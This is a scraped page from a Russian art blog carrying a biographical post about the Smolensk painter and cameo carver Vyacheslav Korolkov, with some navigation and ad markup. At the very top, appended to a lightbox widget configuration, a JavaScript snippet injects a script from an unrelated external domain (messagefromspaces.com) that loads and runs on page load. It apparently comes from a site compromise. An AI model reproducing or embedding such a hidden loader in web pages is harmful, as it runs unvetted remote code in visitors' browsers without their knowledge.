, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Художник Корольков Вячеслав Георгиевич

Автор: Юлия | 19 Май 2011

Имя художника Королькова Вячеслава Георгиевича нашим постоянным посетителям знакомо давно. Его картины "Даниловский монастырь", "Улочка в старом городе", "Розовые лилии", "Собор и береза", "Вид с Игнатовской горы" и многие другие были представлены на нашем сайте одними из первых. И вот, наконец, настал черед познакомить Вас, уважаемые читатели, с творческими и жизненными вехами биографии этого замечательного художника.

Вячеслав Георгиевич родился и вырос в Смоленске. Здесь же получил художественное образование: в 1974 году окончил художественно-графический факультет Смоленского педагогического института. Вскоре после окончания института художник уехал в Ереван, где прожил больше пятнадцати лет. В 1993 году Вячеслав Корольков вернулся в Смоленск, где живет и работает по сей день. С 1991 года он состоит в Союзе художников России.

Вячеслав Георгиевич Корольков не только мастер реалистической живописи, но и талантливый ювелир, прекрасно владеющий искусством глиптики (резьба на драгоценных и полудрагоценных камнях). Он создает удивительные по красоте и изяществу камеи – ювелирные изделия из камня, выполненные в технике барельефа. Глиптика относится к одному из наиболее древних искусств. И создавая свои камеи, Вячеслав Корольков часто обращается к античным традициям, как например, в серии портретов, посвященных видным русским деятелям прошлого.

Вячеслав Георгиевич много путешествует, часто работает на пленере. Художник отдает предпочтение пейзажам и натюрмортам, несколько реже обращается к портретам и сюжетным картинам с участием людей. Его работы отличает необычайная цветовая насыщенность, порой совсем неестественная, но при этом очень бодрящая, легкая, позитивная.

Подробнее познакомиться с творчеством Вячеслава Георгиевича Королькова и приобрести понравившиеся картины Вы можете в нашем интернет-магазине.

Темы: Новости, Художник | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress